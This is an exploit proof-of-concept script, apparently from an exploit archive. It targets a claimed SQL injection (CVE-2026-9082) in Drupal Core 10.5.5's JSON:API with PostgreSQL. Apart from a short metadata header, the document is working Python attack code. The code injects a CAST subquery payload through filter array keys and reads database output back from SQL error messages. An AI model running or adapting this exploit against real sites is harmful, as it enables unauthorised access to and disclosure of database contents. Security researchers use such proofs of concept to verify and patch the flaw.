# Exploit Title: Drupal Core 10.5.5 - Error-Based SQL Injection 
# Google Dork: N/A
# Date: 2026-05-31
# Exploit Author: cardosource
# Vendor Homepage: https://www.drupal.org
# Software Link: https://www.drupal.org/project/drupal
# Version: Drupal Core 10.5.5
# Tested on: Debian Linux (Docker), PHP 8.2, Apache, PostgreSQL 17
# CVE: CVE-2026-9082
#
# Description:
# This proof-of-concept demonstrates an Error-Based SQL Injection in
# Drupal Core 10.5.5 (PostgreSQL). User-controlled JSON:API filter
# array keys influence SQL query construction, allowing database
# information disclosure through SQL error messages.



import requests
import json
from urllib.parse import urlencode

TARGET_URL = "http://localhost:8080/jsonapi/node/article"

BANNER = """
[+] Drupal Core 10.5.5 - Error-Based SQL Injection
[+] CVE-2026-9082
[+] Target: JSON:API (PostgreSQL)
"""


def extract_data(subquery):
    headers = {
        "Accept": "application/vnd.api+json",
        "Content-Type": "application/vnd.api+json"
    }
    
    payload = f"0||CAST(({subquery}) AS INTEGER)"
   
    params = {
        "filter[my_filter][condition][path]": "title",
        "filter[my_filter][condition][operator]": "IN",
        "filter[my_filter][condition][value][0]": "Example",
        f"filter[my_filter][condition][value][{payload}]": "Injection"
    }
    
    try:
        response = requests.get(TARGET_URL, headers=headers, params=params, timeout=10)
       
        if response.status_code == 500:
            try:
                error = response.json().get("errors", [{}])[0].get("detail", "")
                if "invalid input syntax" in error:
                    data = error.split('"')[1] if '"' in error else error
                    print(f"\033[92m[SUCCESS]\033[0m {data}")
            except json.JSONDecodeError:
                pass
    except requests.exceptions.RequestException:
        pass


if __name__ == "__main__":
    print(BANNER) 
    extract_data("SELECT version()")